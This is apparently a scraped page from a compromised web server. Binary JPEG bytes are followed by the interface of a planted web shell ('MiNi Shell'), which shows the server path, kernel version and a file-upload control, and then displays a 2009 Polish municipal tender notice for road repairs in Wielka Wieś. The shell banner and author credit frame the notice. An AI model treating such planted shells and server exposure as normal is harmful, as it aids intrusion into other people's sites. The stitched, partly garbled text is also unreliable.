JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/162090-N-2009.html

<p class="kh_header"><b>Wielka Wieś: Remont dróg będacych w Zarządzie Gminy Wielka Wieś</b><br>
<b>Numer ogłoszenia: 162090 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielka Wieś , ul. Wesoła 48, 32-089 Wielka Wieś, woj. małopolskie, tel. 012 4191704, faks 012 4191705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielka-wies.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dróg będacych w Zarządzie Gminy Wielka Wieś.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont dróg będących w Zarządzie Gminy Wielka Wieś w roku 2009
1.1.Zakres rzeczowy zamówienia obejmuje:


1)	Modlniczka - ulica Sąsiedzka dz. nr 292/1
-     zebranie warstwy ziemi z powierzchni drogi
-	wyrównanie istniejącej podbudowy tłuczniem kamiennym
-	nawierzchnia z mieszanek mineralno-bitumicznych gr. 4cm (w-wa wiążąca) 
-	nawierzchnia z mieszanek mineralno-bitumicznych gr. 4cm (w-wa ścieralna) 
-	utwardzenie poboczy destruktem asfaltowym gr. 8cm

2)	Modlniczka - ulica Zielona dz. nr 899
-    ścinanie poboczy
-	koryta wykonywane na całej szerokości jezdni
-	podbudowy z kruszyw łamanych-warstwa dolna 
-	podbudowy z kruszyw łamanych-warstwa górna

3)	Szyce - Cader nr dz. 214/3
-    ścięcie skarp
-	ścinanie poboczy
-	koryta wykonywane na całej szerokości jezdni
-	podbudowy z kruszyw łamanych-warstwa dolna 
-	podbudowy z kruszyw łamanych-warstwa górna
4)	Szyce - droga za Urzędem dz. nr 213/1
-    ścinanie poboczy
-	koryta wykonywane na całej szerokości jezdni
-	podbudowy z kruszyw łamanych-warstwa dolna 
-	podbudowy z kruszyw łamanych-warstwa górna

5)	Prądnik Korzkiewski - od Skalskiej drogi dz. nr 263/1
-    oczyszczanie, plantowanie i ścinanie poboczy 
-	wyrównanie istniejącej podbudowy tłuczniem kamiennym
-	podbudowa z kruszyw łamanych w-wa dolna gr. 20cm
-	przepusty drogowe fi 2x100 cm
-	obudowy wlotów przepustów drogowych 
-	poręcze ochronne sztywne z pochwytem z rur fi 60mm
-	przepust drogowy przelotowy fi 100 cm
-	obudowy wlotów przepustu drogowego 
-	poręcze ochronne sztywne z pochwytem z rur fi 60mm

6)	Czajowice - droga Polna dz. nr 531
-	ścinanie poboczy
-	wyrównanie istniejącej podbudowy tłuczniem
-	nawierzchnia z mieszanek mineralno-bitumicznych gr. 4cm (w-wa wiążąca) 
-	nawierzchnia z mieszanek mineralno-bitumicznych gr. 4cm (w-wa ścieralna)
-	obsypanie poboczy destruktem asfaltowym

7)	Bębło - droga do Jasińskiego dz. nr 184
-    ścinanie poboczy
-	koryta wykonywane na całej szerokości jezdni
-	podbudowy z kruszyw łamanych-warstwa dolna 
-	podbudowy z kruszyw łamanych-warstwa górna

8)	Tomaszowice - ulica Zacisze dz. nr 585
-    ścinanie poboczy
-	koryta wykonywane na całej szerokości jezdni
-	podbudowy z kruszyw łamanych-warstwa dolna 
-	podbudowy z kruszyw łamanych-warstwa górna
-    oczyszczanie i ścinanie poboczy do 10 cm
-	nawierzchnia z mieszanek mineralno-bitumicznych gr. 4cm (w-wa wiążąca) 
-	nawierzchnia z mieszanek mineralno-bitumicznych gr. 4cm (w-wa ścieralna)
-	utwardzenie poboczy destruktem asfaltowym gr. 8cm

9)	Tomaszowice - ulica Słoneczna nr dz. 367
-	profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne
-	podbudowy z kruszyw łamanych-warstwa dolna 
-	podbudowy z kruszyw łamanych-warstwa górna

10)	Modlnica - ulica Cegielniana dz. nr 32
-	oczyszczenie, plantowanie i ścinanie poboczy
-	wykonanie ław fundamentowych betonowych pod korytka ściekowe
-	ścieki z elementów betonowych
-	skropienie bitumem nawierzchni drogowej
-	nawierzchnia z mieszanek mineralno-bitumicznych gr.4cm (w-wa wiążąca)
-	nawierzchnia z mieszanek mineralno-bitumicznych gr.4 cm (w-wa ścieralna)
-	utwardzenie poboczy destruktem asfaltowym gr. 10cm

11)	Modlnica - ulica Jurajska dz. nr 472
-	ścinanie poboczy
-	koryta wykonywane na całej szerokości jezdni
-	podbudowy z kruszyw łamanych-warstwa dolna 
-	podbudowy z kruszyw łamanych-warstwa górna

12)	Modlnica - ulica Rydza Śmigłego dz. nr 422
-	ścinanie poboczy
-	koryta wykonywane na całej szerokości jezdni
-	podbudowy z kruszyw łamanych-warstwa dolna 
-	podbudowy z kruszyw łamanych-warstwa górna

13)	Wierzchowie - Studzienki dz. nr 376
-	ścinanie poboczy
-	wyrównanie istniejącej podbudowy tłuczniem
-	nawierzchnia z mieszanek mineralno-bitumicznej gr. 4cm, warstwa wiążąca
-	nawierzchnia z mieszanek mineralno-bitumicznej gr. 4cm, warstwa ścieralna
-	utwardzenie poboczy destruktem asfaltowym gr. 10cm

14)	Biały Kościół - MATRIX dz. nr 678/1
-	 ścinanie poboczy
-	koryta wykonywane na całej szerokości jezdni
-	podbudowy z kruszyw łamanych-warstwa dolna 
-	podbudowy z kruszyw łamanych-warstwa górna

15)	Będkowice - droga przez dolinę dz. nr 791 i 797
-	ścinanie poboczy
-	wyrównanie istniejącej podbudowy tłuczniem
-	nawierzchnia z mieszanek mineralno-bitumicznej gr. 4cm, warstwa wiążąca
-	nawierzchnia z mieszanek mineralno-bitumicznej gr. 4cm, warstwa ścieralna
-	utwardzenie poboczy destruktem asfaltowym gr. 10cm

 16) Będkowice - pętla autobusowa
-	usunięcie humusu
-	profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne
-	podbudowy z kruszyw łamanych-warstwa dolna 
-	podbudowy z kruszyw łamanych-warstwa górna
-	nawierzchnia z mieszanek mineralno-bitumicznej 
-	nawierzchnia z mieszanek mineralno-bitumicznej 
- 	rozścielenie ziemi urodzajnej (humus)

17) Giebułtów - droga do Chrzana dz. nr 362
-	oczyszczanie, plantowanie i ścinanie poboczy 
-	wykonanie koryta na całej szerokości jezdni 
-	podbudowa z kruszyw łamanych warstwa dolna
-	podbudowa z kruszyw łamanych warstwa górna 
-	ława fundamentowa betonowa pod korytka ściekowe
-	ścieki z elementów betonowych
-	oczyszczenie i skropienie bitumem nawierzchni drogowej
-	nawierzchnia z mieszanek mineralno-bitumicznych gr.4cm (w-wa wiążąca)
-	nawierzchnia z mieszanek mineralno-bitumicznych gr.4cm (w-wa ścieralna)
-	utwardzenie poboczy destruktem asfaltowym gr. 8cm

18) Giebułtów - Stawki do Koguta dz. nr 484
-	ścinanie poboczy
-	koryta wykonywane na całej szerokości jezdni
-	podbudowy z kruszyw łamanych-warstwa dolna 
-	podbudowy z kruszyw łamanych-warstwa górna
-	skropienie bitumem nawierzchni drogowej
-	utwardzenie poboczy destruktem asfaltowym

19) Giebułtów - droga do Jóźkiewicza dz. nr 513
-	ścinanie poboczy
-	koryta wykonywane na całej szerokości jezdni
-	podbudowy z kruszyw łamanych-warstwa dolna 
-	podbudowy z kruszyw łamanych-warstwa górna
-	skropienie bitumem nawierzchni drogowej
-	utwardzenie poboczy destruktem asfaltowym

1.2	Szczegółowy zakres robót ujęty został w przedmiarach robót stanowiących załącznik do niniejszej dokumentacji przetargowej, które stanowią materiały pomocnicze przy wyliczaniu kosztów realizacji przedmiotu zamówienia. 
1.3	Wykonawca informować będzie telefonicznie Zamawiającego każdorazowo o planowanym rozpoczęciu robót na poszczególnych drogach będących w Zarządzie Gminy. Należy w harmonogramie robót przewidzieć wykonanie zadania określonego w ust.1 pkt.1.1, podpkt.22 jako priorytetowe.
1.4	Wykonawca będzie inspiratorem i koordynatorem wszelkich prac, uzgodnień i zezwoleń niezbędnych do prawidłowego wykonania przedmiotu zamówienia.
1.5	Wykonawca dokona stosownego zgłoszenia robót.
1.6	Zapewnić wykonanie uzgodnień i projektów organizacji ruchu na czas robót z bieżącym utrzymaniem oznakowania i jego likwidacji po zakończeniu robót oraz utrzymanie dojść i dojazdów do przyległych posesji.
1.7	Uzgodnienie objazdów i zamknięcia dróg z przedsiębiorcami prowadzącymi działalność transportu publicznego w tym MPK.
1.8	Wszelkie inne roboty konieczne do wykonania zadania nie wymienione powyżej.

2. Zamawiający zastrzega sobie prawo do  zmiany ilości zakresu przedmiotu określonego w SIWZ. Rozliczenie robot następować będzie na podstawie protokołów odbioru rzeczywiście wykonanych robót  oraz kosztorysu powykonawczego sporządzonego na nośnikach oraz cenach jednostkowych z kosztorysu ofertowego wykonanego na całość przedmiotu zamówienia.
3. Przedmiot zamówienia należy wykonać zgodnie z :

1)	warunkami wynikającymi z obowiązujących przepisów technicznych i prawa budowlanego,
2)	wymaganiami wynikającymi z obowiązujących Polskich Norm i aprobat technicznych,
3)	warunkami technicznymi wykonania i odbioru robót budowlano- montażowych ,
4)	zasadami rzetelnej wiedzy technicznej, przy czym w razie sprzeczności pomiędzy tymi źródłami, pierwszeństwo stosowania mają aktualne obowiązujące przepisy prawne..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wadium w kwocie 20 tys. zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1	Do przetargu zostaną zakwalifikowani Wykonawcy, którzy:

1/ posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2/ posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
   i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób zdolnych do wykonania zamówienia.
3/ znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4/ nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.

Ponad to Wykonawcy muszą spełniać następujące warunki:

a)	wykazać się wykonaniem w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania a jeżeli okres prowadzenia działalności jest krótszy w tym okresie,  co najmniej 2 robotami budowlanymi odpowiadającymi swoim rodzajem robotom stanowiącym przedmiot zamówienia o wartości 500 tyś. każda. Wykaz musi posiadać lokalizację, adres inwestora, wartość robót oraz datę realizacji robót.Za roboty tego samego rodzaju Zamawiający uzna roboty budowlane związane z budową, przebudową lub remontem dróg tłuczniowych oraz z nawierzchni bitumicznej .
b)	mieć w dyspozycji personel:
-kierownika budowy z uprawnieniami w zakresie budowy dróg ,oraz wykazać że przynależy do właściwej Izby Inżynierów Budownictwa 
-osobę uprawnioną do kierowania ruchem drogowym
- operatorzy sprzętu oraz pracownicy fizyczni w ilości niezbędnej do wykonania robót.
c)	mieć w dyspozycji sprzęt niezbędny o prawidłowego wykonania przedmiotu zamówienia. Wymagane minimum potencjału technicznego to:
koparka - 2 szt.
równiarka-2 szt.
walec statyczny - 3 szt.
rozkładarka mas bitumicznych o szerokości od 3m do 6 m - 3 szt.
środki transportu w ilości i ładowności zapewniającej ciągłość pracy minimum 2 szt.

2.	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły  spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach przedstawionych w ofercie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków, Wykonawcy winni przedstawić następujące dokumenty  i oświadczenia:

1.1.	Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa 
w art. 22 ust. 1 pkt. 1-3 ustawy Prawo zamówień publicznych  zgodnie z treścią załącznika nr 2 do niniejszej specyfikacji.

1.2.	Oświadczenie o nie podleganiu wykluczeniu z  postępowania na podstawie art. 24 ust. 1 i 2  ustawy Prawo zamówień publicznych, zgodnie z treścią załącznika nr 3 do niniejszej specyfikacji.

1.3.		Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert.

1.4.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,  wystawione nie wcześniej niż 3 miesiące przed  upływem terminu składania ofert.

1.5.		Aktualne zaświadczenie właściwego oddziału ZUS-u lub Kasy Rolniczego Ubezpieczenia  Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem  składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed  upływem terminu składania ofert.

1.6.Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia - na formularzu zgodnym z treścią załącznika Nr 4 do niniejszej specyfikacji. Wymagane minimum potencjału kadrowego to
 -kierownik budowy z uprawnieniami w zakresie budowy dróg ,
-osoba uprawniona do kierowania ruchem drogowym
- operatorzy sprzętu oraz pracownicy fizyczni w ilości niezbędnej do wykonania robót.

1.7.	Dokumenty stwierdzające uprawnienia osoby przewidzianej  do kierowania robotami wraz z zaświadczeniem z właściwej Izby Inżynierów Budownictwa oraz osoby uprawnionej do kierowania ruchem   

1.8.		Zobowiązanie pisemne innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w załączonym wykazie Wykonawca wskazał osoby, którymi będzie dysponował.

1.9.	Wykaz robót budowlanych wykonanych w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania a jeżeli okres prowadzenia działalności jest krótszy w tym okresie,  co najmniej 2 robotami budowlanymi odpowiadającymi swoim rodzajem robotom stanowiącym przedmiot zamówienia o wartości 500 tyś. każda. Wykaz musi posiadać lokalizację, adres inwestora, wartość robót oraz datę realizacji robót. Za roboty tego samego rodzaju Zamawiający uzna roboty budowlane związane z budową, przebudową lub remontem dróg tłuczniowych oraz z nawierzchni bitumicznej .

W zakresie doświadczenia co najmniej jeden z Wykonawców wspólnych musi udowodnić że spełnia warunek udziału w postępowaniu.

1.10.		Dokumenty potwierdzające, że wykazane roboty zostały wykonane z należytą starannością.

1.11	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca  na formularzu zgodnym z treścią  załącznika nr 6  do niniejszej siwz . Wymagane minimum potencjału technicznego to:
koparka - 2 szt.
równiarka-2 szt.
walec statyczny - 3 szt.
rozkładarka mas bitumicznych o szerokości od 3m do 6 m - 3 szt.
środki transportu w ilości i ładowności zapewniającej ciągłość pracy minimum 2 szt.

1.12		Zobowiązanie pisemne innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń jeżeli w załączonym wykazie Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wielka-wies.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wielka Wieś, ul. Wesoła 48, 32-089 Wielka Wieś.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 09:30, miejsce: Urząd Gminy Wielka Wieś, ul. Wesoła 48, 32-089 Wielka Wieś.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com